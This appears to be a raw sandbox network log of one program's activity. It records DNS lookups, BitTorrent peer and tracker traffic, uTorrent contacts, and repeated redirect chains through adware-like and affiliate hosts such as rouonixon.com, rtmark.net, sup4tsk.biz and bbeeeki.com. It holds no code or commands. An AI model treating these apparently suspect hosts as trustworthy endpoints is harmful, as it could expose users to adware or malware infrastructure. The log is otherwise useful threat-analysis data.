US 8.8.8.8:53 57.179.179.143.in-addr.arpa udp
US 8.8.8.8:53 159.194.59.125.in-addr.arpa udp
US 8.8.8.8:53 199.249.23.193.in-addr.arpa udp
US 8.8.8.8:53 25.37.47.93.in-addr.arpa udp
US 8.8.8.8:53 119.62.133.43.in-addr.arpa udp
US 8.8.8.8:53 71.184.231.95.in-addr.arpa udp
US 8.8.8.8:53 103.122.4.177.in-addr.arpa udp
US 8.8.8.8:53 76.124.236.119.in-addr.arpa udp
US 8.8.8.8:53 194.16.142.89.in-addr.arpa udp
US 8.8.8.8:53 128.203.173.121.in-addr.arpa udp
US 8.8.8.8:53 34.189.37.125.in-addr.arpa udp
US 8.8.8.8:53 99.9.29.5.in-addr.arpa udp
US 8.8.8.8:53 164.160.103.75.in-addr.arpa udp
US 8.8.8.8:53 237.116.38.157.in-addr.arpa udp
US 8.8.8.8:53 248.79.232.120.in-addr.arpa udp
US 8.8.8.8:53 244.81.233.45.in-addr.arpa udp
US 8.8.8.8:53 127.53.17.95.in-addr.arpa udp
US 8.8.8.8:53 233.7.47.41.in-addr.arpa udp
DZ 41.99.87.115:55196 udp
US 104.222.16.99:57190 udp
PL 83.29.62.94:60923 udp
DZ 41.99.87.115:55196 tcp
US 104.222.16.99:57190 tcp
PL 83.29.62.94:60923 tcp
GB 217.44.73.79:43558 udp
GB 217.44.73.79:43558 tcp
GB 181.215.176.83:50993 udp
GB 181.215.176.83:50993 tcp
NL 93.158.213.92:1337 tracker.opentrackr.org udp
US 44.196.33.1:443 ledger.bt.co tcp
US 3.210.17.85:80 i-28.b-47142.ut.bench.utorrent.com tcp
GB 88.221.134.194:443 ced.sascdn.com tcp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 146.70.173.160:62801 udp
US 146.70.172.32:62801 udp
CH 188.60.237.252:1024 udp
GB 143.58.200.241:56820 udp
KR 221.144.33.54:42597 udp
BR 191.6.103.225:51060 udp
RU 89.208.97.54:34847 udp
JP 203.165.46.46:6881 udp
IT 93.35.168.249:32775 udp
BR 189.74.219.253:46244 udp
MX 177.245.155.112:33544 udp
FI 65.108.78.54:6881 udp
GY 190.80.34.130:57072 udp
BG 79.100.105.107:51769 udp
RU 46.63.252.24:49001 udp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 146.70.173.160:62801 tcp
US 146.70.172.32:62801 tcp
US 103.224.182.246:6969 tracker.coppersurfer.tk udp
VN 183.80.50.58:49836 udp
PH 175.176.50.58:15577 udp
N/A 239.192.152.143:6771 udp
BR 200.225.113.105:35281 udp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
IQ 37.239.7.233:49784 udp
UZ 213.230.116.237:42637 udp
US 8.8.8.8:53 54.33.144.221.in-addr.arpa udp
US 8.8.8.8:53 54.97.208.89.in-addr.arpa udp
US 8.8.8.8:53 46.46.165.203.in-addr.arpa udp
US 8.8.8.8:53 130.34.80.190.in-addr.arpa udp
US 8.8.8.8:53 246.182.224.103.in-addr.arpa udp
US 8.8.8.8:53 58.50.80.183.in-addr.arpa udp
US 8.8.8.8:53 107.105.100.79.in-addr.arpa udp
US 8.8.8.8:53 253.219.74.189.in-addr.arpa udp
US 8.8.8.8:53 249.168.35.93.in-addr.arpa udp
US 8.8.8.8:53 241.200.58.143.in-addr.arpa udp
US 8.8.8.8:53 233.7.239.37.in-addr.arpa udp
US 8.8.8.8:53 237.116.230.213.in-addr.arpa udp
N/A 10.127.0.42:50993 udp
N/A 127.0.0.1:50993 udp
N/A 10.127.0.42:50993 tcp
N/A 127.0.0.1:50993 tcp
FR 45.147.96.190:51413 udp
AU 123.208.50.58:33591 udp
IE 54.194.124.68:6881 udp
MX 189.140.142.38:53972 udp
CN 183.192.15.122:8906 udp
BR 189.29.137.99:40440 udp
KR 125.132.186.103:6881 udp
SG 58.182.157.48:6881 udp
KR 121.151.53.141:7829 udp
AM 5.77.205.165:58984 udp
RU 5.44.10.224:2079 udp
CA 99.252.147.131:57823 udp
US 8.8.8.8:53 131.147.252.99.in-addr.arpa udp
BR 177.137.146.50:15039 udp
SG 101.32.169.145:6881 udp
HK 119.28.68.97:6881 udp
RU 91.132.107.136:1426 udp
NZ 121.75.17.177:8621 udp
RU 95.24.4.152:6859 udp
US 8.8.8.8:53 152.4.24.95.in-addr.arpa udp
US 8.8.8.8:53 50.146.137.177.in-addr.arpa udp
CN 223.74.72.241:58109 udp
RU 109.252.14.38:1838 udp
RU 81.24.85.119:1215 udp
TH 223.207.218.121:49001 udp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
KR 125.143.41.188:1070 udp
IT 82.49.87.112:6881 udp
US 199.59.243.227:2730 9.rarbg.me udp
CN 119.177.55.156:25702 udp
NL 87.233.192.212:6969 eddie4.nl udp
TT 143.137.195.221:38339 udp
RU 77.91.229.218:6969 tracker.mg64.net udp
US 8.8.8.8:53 218.229.91.77.in-addr.arpa udp
US 8.8.8.8:53 open.demonii.si udp
CZ 46.8.8.100:1337 open.demonii.si udp
RU 83.146.81.79:6969 tracker.tiny-vps.com udp
US 8.8.8.8:53 ipv6.tracker.harry.lu udp
US 38.89.70.177:61792 udp
US 199.59.243.227:2740 tracker.justseed.it udp
US 199.59.243.227:2770 tracker.justseed.it udp
NL 104.192.42.148:443 api-torrent.ru tcp
NL 194.146.127.97:443 s2.api-torrent.ru tcp
US 8.8.8.8:53 97.127.146.194.in-addr.arpa udp
US 8.8.8.8:53 denis.stalker.upeer.me udp
GB 88.221.135.9:80 e6.i.lencr.org tcp
N/A 127.0.0.1:6969 udp
US 104.21.54.3:6969 tracker.moeking.me udp
US 208.83.20.20:6969 exodus.desync.com udp
BR 45.239.222.18:51536 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 199.59.243.227:1337 tracker.justseed.it udp
FR 89.234.156.205:451 tracker.torrent.eu.org udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 95.100.244.132:443 s.go-mpulse.net tcp
N/A 127.0.0.1:80 udp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 208.100.26.242:6969 tracker.open-internet.nl udp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 ae.mmstat.com udp
US 8.8.8.8:53 ae.mmstat.com udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
SG 47.246.110.44:443 ae.mmstat.com tcp
GB 163.181.154.244:443 bottom.campaign.aliexpress.com tcp
US 8.8.8.8:53 133.194.101.151.in-addr.arpa udp
US 172.234.222.143:6969 torrentclub.tech udp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
NO 185.243.218.213:80 open.stealth.si udp
GB 95.100.244.36:443 ae01.alicdn.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 aeis.alicdn.com udp
US 8.8.8.8:53 aeis.alicdn.com udp
DE 47.246.146.13:443 acs.aliexpress.com tcp
MX 189.219.231.179:3291 udp
US 8.8.8.8:53 us.ynuf.aliapp.org udp
US 172.234.222.138:80 torrentclub.tech tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 172.234.222.143:80 torrentclub.tech tcp
US 8.8.4.4:443 dns.google udp
SG 13.229.114.252:443 wstracker.online tcp
DE 47.246.146.192:443 tcp
CN 124.239.14.253:443 tcp
CN 124.239.14.253:443 tcp
DE 47.246.146.191:443 tcp
IN 117.193.236.132:48490 udp
US 54.210.117.250:443 service-domain.xyz tcp
AU 203.220.191.213:61986 udp
GB 88.221.134.137:80 r10.o.lencr.org tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 142.250.178.14:443 clients2.google.com tcp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
GB 142.250.178.14:443 clients2.google.com tcp
GB 95.100.244.132:443 s.go-mpulse.net udp
US 172.67.192.10:80 start7345724.ru tcp
US 35.162.118.53:80 api3.check-data.xyz tcp
US 172.67.159.189:443 gamecloudshare.uno tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.162.118.53:443 api3.check-data.xyz tcp
HU 5.187.235.0:50921 udp
KZ 185.22.66.16:80 www.rapidfilestorage.com tcp
KZ 185.22.66.16:80 www.rapidfilestorage.com tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
GB 216.58.212.227:443 update.googleapis.com tcp
US 172.67.218.22:443 skidrowgamereloaded.co tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
GB 142.250.180.14:443 www.youtube.com udp
GB 142.250.180.14:443 www.youtube.com tcp
CN 124.239.14.252:443 tcp
US 172.64.147.188:443 kit.fontawesome.com tcp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
CN 124.239.14.252:443 tcp
RU 88.212.201.198:443 counter.yadro.ru tcp
GB 142.250.178.22:443 i.ytimg.com udp
DZ 41.99.87.115:55196 tcp
GB 142.250.187.206:443 www.youtube.com udp
GB 142.250.187.206:443 www.youtube.com tcp
US 44.226.34.177:443 api3.check-data.xyz tcp
US 44.226.34.177:443 api3.check-data.xyz tcp
SA 31.166.86.133:28389 udp
NL 104.192.42.148:443 api-torrent.ru tcp
US 172.234.222.138:80 torrentclub.tech tcp
US 172.234.222.143:80 torrentclub.tech tcp
CA 174.93.18.28:47445 udp
US 8.8.4.4:443 dns.google udp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
FR 5.196.111.64:443 www9.smartadserver.com tcp
FR 5.196.111.64:443 www9.smartadserver.com tcp
US 146.70.172.32:62801 tcp
RU 95.78.208.118:52201 udp
GB 181.215.176.83:50993 tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 146.70.173.160:62801 tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
KZ 188.0.147.111:20504 udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 95.100.244.132:443 s.go-mpulse.net tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 ae.mmstat.com udp
US 8.8.8.8:53 ae.mmstat.com udp
SG 47.246.110.45:443 ae.mmstat.com tcp
GB 163.181.154.244:443 bottom.campaign.aliexpress.com tcp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
DE 47.246.146.13:443 acs.aliexpress.com tcp
US 8.8.8.8:53 aeis.alicdn.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google udp
RU 5.140.3.18:49001 udp
DE 47.246.146.53:443 tcp
CN 124.239.14.252:443 tcp
DE 47.246.146.54:443 us.ynuf.aliapp.org tcp
CN 124.239.14.252:443 tcp
RU 152.89.198.214:53 bbeeeki.com udp
US 185.208.158.202:80 bbeeeki.com tcp
US 8.8.8.8:53 202.158.208.185.in-addr.arpa udp
KR 221.165.161.197:40629 udp
US 172.234.222.143:80 torrentclub.tech tcp
US 172.234.222.138:80 torrentclub.tech tcp
KR 112.184.199.201:40796 udp
FR 5.196.111.64:443 www9.smartadserver.com tcp
FR 5.196.111.64:443 www9.smartadserver.com tcp
US 104.222.16.99:57190 tcp
GB 217.44.73.79:43558 tcp
CN 114.84.254.47:42833 udp
CN 124.239.14.253:443 tcp
CN 124.239.14.253:443 tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
GB 90.242.248.253:8025 udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 95.100.244.132:443 s.go-mpulse.net tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 ae.mmstat.com udp
US 8.8.8.8:53 ae.mmstat.com udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
SG 47.246.110.44:443 ae.mmstat.com tcp
GB 163.181.154.237:443 bottom.campaign.aliexpress.com tcp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 aeis.alicdn.com udp
US 8.8.8.8:53 aeis.alicdn.com udp
DE 47.246.146.13:443 acs.aliexpress.com tcp
US 8.8.8.8:53 us.ynuf.aliapp.org udp
US 8.8.8.8:53 us.ynuf.aliapp.org udp
DE 47.246.146.54:443 us.ynuf.aliapp.org tcp
US 8.8.8.8:53 3sr0fd.tdum.alibaba.com udp
US 8.8.8.8:53 3sr0fd.tdum.alibaba.com udp
US 8.8.8.8:53 ynuf.aliapp.org udp
US 8.8.8.8:53 ynuf.aliapp.org udp
CN 124.239.14.253:443 ynuf.aliapp.org tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
CN 124.239.14.253:443 ynuf.aliapp.org tcp
RU 212.103.119.182:49001 udp
US 8.8.8.8:443 dns.google udp
DE 47.246.146.191:443 3sr0fd.tdum.alibaba.com tcp
IL 212.199.154.18:19463 udp
CA 70.71.199.183:1449 udp
DZ 41.99.87.115:55196 tcp
CN 124.239.14.252:443 ynuf.aliapp.org tcp
CN 124.239.14.252:443 ynuf.aliapp.org tcp
BE 109.138.39.147:58947 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 185.208.158.202:80 bbeeeki.com tcp
NL 89.105.201.183:2023 tcp
US 72.21.17.92:32365 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 95.100.244.132:443 s.go-mpulse.net tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
GB 2.18.108.132:443 c.go-mpulse.net udp
US 38.83.113.109:51506 udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 104.231.154.69:6889 udp
US 172.234.222.138:80 torrentclub.tech tcp
US 172.234.222.143:80 torrentclub.tech tcp
NL 185.149.91.65:51026 udp
GB 149.86.39.227:41963 udp
US 8.8.8.8:443 dns.google udp
US 172.249.114.78:51413 udp
US 146.70.172.32:62801 tcp
GB 181.215.176.83:50993 tcp
US 146.70.173.160:62801 tcp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
GB 161.51.236.3:49001 udp
US 69.121.163.21:6882 udp
RU 82.204.172.170:6881 udp
US 8.8.4.4:443 dns.google udp
GB 216.58.212.227:443 update.googleapis.com tcp
US 185.208.158.202:80 bbeeeki.com tcp
NL 89.105.201.183:2023 tcp
NL 178.162.174.226:28000 udp
US 192.227.134.50:16881 udp
BR 200.193.131.13:40589 udp
CN 60.187.175.97:1047 udp
DZ 41.99.87.115:55196 tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
FR 62.210.181.13:48750 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.132:443 s.go-mpulse.net tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
US 8.8.8.8:53 ae.mmstat.com udp
US 8.8.8.8:53 ae.mmstat.com udp
GB 163.181.154.241:443 bottom.campaign.aliexpress.com tcp
SG 47.246.110.42:443 ae.mmstat.com tcp
GB 95.100.244.36:443 ae01.alicdn.com udp
CA 184.75.221.59:17798 udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 59.221.75.184.in-addr.arpa udp
DE 47.246.146.126:443 acs.aliexpress.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google udp
JP 113.38.110.7:6889 udp
KR 125.135.64.7:7523 udp
NL 185.165.243.54:6886 udp
US 172.234.222.138:80 torrentclub.tech tcp
US 172.234.222.143:80 torrentclub.tech tcp
US 185.208.158.202:80 bbeeeki.com tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
NL 95.211.83.89:52718 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 8.8.8.8:53 dreamsnest.com udp
US 8.8.8.8:53 dreamsnest.com udp
US 172.67.211.143:443 dreamsnest.com udp
US 172.67.211.143:443 dreamsnest.com tcp
US 8.8.8.8:53 secret-sleeps.dreamingfordreams.com udp
US 8.8.8.8:53 secret-sleeps.dreamingfordreams.com udp
US 104.21.93.126:443 secret-sleeps.dreamingfordreams.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
US 8.8.8.8:53 www.google.co.uk udp
GB 142.250.200.14:443 fundingchoicesmessages.google.com tcp
US 216.239.34.36:443 region1.analytics.google.com tcp
BE 64.233.167.154:443 stats.g.doubleclick.net tcp
GB 142.250.179.227:443 www.google.co.uk udp
GB 142.250.200.14:443 fundingchoicesmessages.google.com udp
GB 142.250.200.14:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 154.167.233.64.in-addr.arpa udp
US 8.8.8.8:53 cloudflareinsights.com udp
US 8.8.8.8:53 cloudflareinsights.com udp
US 104.16.80.73:443 cloudflareinsights.com tcp
CL 200.90.211.40:19665 udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
BR 177.118.136.171:56495 udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google udp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 87.248.204.1:443 video.rainberrytv.com tcp
GB 87.248.204.1:443 video.rainberrytv.com tcp
GB 87.248.204.1:443 video.rainberrytv.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
FR 178.32.197.49:443 www9.smartadserver.com tcp
FR 178.32.197.49:443 www9.smartadserver.com tcp
CA 69.165.224.193:25447 udp
NL 46.232.211.143:64245 udp
US 54.167.59.98:80 i-38.b-47142.ut.bench.utorrent.com tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
FR 5.39.85.82:55727 udp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
FR 178.32.197.49:443 www9.smartadserver.com tcp
FR 178.32.197.49:443 www9.smartadserver.com tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 8.8.8.8:53 exclusivesearches.xyz udp
US 8.8.8.8:53 exclusivesearches.xyz udp
US 52.44.32.213:443 exclusivesearches.xyz tcp
US 8.8.8.8:53 comarinis.com udp
US 8.8.8.8:53 comarinis.com udp
US 104.21.85.120:443 comarinis.com udp
US 104.21.85.120:443 comarinis.com tcp
US 8.8.8.8:53 120.85.21.104.in-addr.arpa udp
SG 188.241.80.38:16813 udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
GB 181.215.176.83:50993 tcp
PY 45.228.136.204:44655 udp
MX 189.156.243.194:14366 udp
US 185.208.158.202:80 bbeeeki.com tcp
ES 79.117.47.90:6881 udp
US 8.8.8.8:53 90.47.117.79.in-addr.arpa udp
FR 178.32.197.49:443 www9.smartadserver.com tcp
FR 178.32.197.49:443 www9.smartadserver.com tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
NL 169.150.223.229:64067 udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net udp
